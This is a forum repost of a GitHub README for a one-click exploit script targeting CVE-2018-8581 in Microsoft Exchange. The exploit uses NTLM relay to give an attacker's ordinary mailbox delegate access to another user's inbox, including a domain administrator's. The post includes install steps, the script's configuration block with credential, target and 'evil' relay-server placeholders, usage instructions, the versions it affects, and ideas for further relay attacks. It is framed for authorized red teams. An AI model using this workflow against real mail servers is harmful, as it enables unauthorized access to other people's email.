Nytro Posted January 4, 2019 Report Posted January 4, 2019 CVE-2018-8581 This is a horizontal penetration and privilege vulnerability at the mailbox level. It can complete the delegate takeover of other users (including domain administrators) mailbox inbox after having a common authority email account password. This EXP script is an enhanced one-click script modified on the basis of the original PoC . It will automatically complete the addition and deletion of the target mailbox inbox after the relevant parameters are configured to facilitate the security department and red of Party A. The team completes a simulated attack process for the authorized enterprise. The original PoC is a combination of two scripts to complete the operation of adding a receiving rule. It is not very practical in the actual work of the Party A red team. In addition to the mailbox, the original PoC needs to set the SID of the target mailbox user, but in the reference article . The method of obtaining the user SID mentioned, I tested in the actual environment, the Exchange Server 2010 and 2013 versions have not been successfully reproduced (2010 no relevant operation options, 2013 will prompt no permission to operate), and finally my idea is to complete first A reverse delegation to get the SID of the target mailbox user and then remove the delegate how to use Install python-ntlm pip install python-ntlm Related parameter configuration in the script below code ... # Exchange server config IP = ' mail.target_domain.com ' PORT = 443 PROTO = ' https ' # PORT = 80 # PROTO = 'http' # CONTROLLED_EMAIL and TARGET_EMAIL config USER = ' the_email_u_have ' DOMAIN = ' the_domain_name ' PASS = ' password_of_the_email_u_have ' TARGET_EMAIL = " the_target_email_u_want@target_domain.com " CONTROLLED_EMAIL = " the_email_u_have@target_domain " # FLAG == 1 --> AddDelegate, FLAG == 0 --> RemoveDelegate FLAG = 1 # Exchange server version # EXCHANGE_VERSION = "Exchange2010_SP1" EXCHANGE_VERSION = " Exchange2010_SP2 " # EXCHANGE_VERSION = "Exchange2010_SP3" # EXCHANGE_VERSION = "Exchange2013" # EXCHANGE_VERSION = "Exchange2016" # Port and url of ur HTTP server that will use NTLM hashes for impersonation of TARGET_EMAIL HTTPPORT = 8080 EVIL_HTTPSERVER_URL = " http://ur_http_server_ip:8080/ " ... Run the script, then drink tea, wait a minute The inbox inbox for TARGET_EMAIL has been successfully delegated to CONTROLLED_EMAIL View the target mailbox inbox in owa or outlook Change FLAG to 0, run the script again, then drink the tea again, wait another minute, and then remove the previously added delegate. Has no permission to access again Applicable environment Python 2.7.14 Exchange Server 2010 (stable, testing basic Exchange Server 2010 can be successful) Exchange Server 2013 (environmental differences may fail) Exchange Server 2016 (environmental differences may fail) More More EWS SOAP API requests can be modified within the make_relay_body() function. In an attempt to further exploit the relay Net-NTLM hash to attack other hosts that do not need SMB-signed host, it is found that the obtained hashes are all ExchangeServers...may be used for cross-protocol relay attacks when Exchange Server disables SMB signatures. ExchangeServer, but this situation is basically hard to come by... Description The script is for learning and communication only. Please follow the relevant local laws. If the legal responsibility for other purposes is irrelevant to the author, downloading and using means that the user agrees with the above viewpoint. Sursa: https://github.com/WyAtu/CVE-2018-8581/ Quote
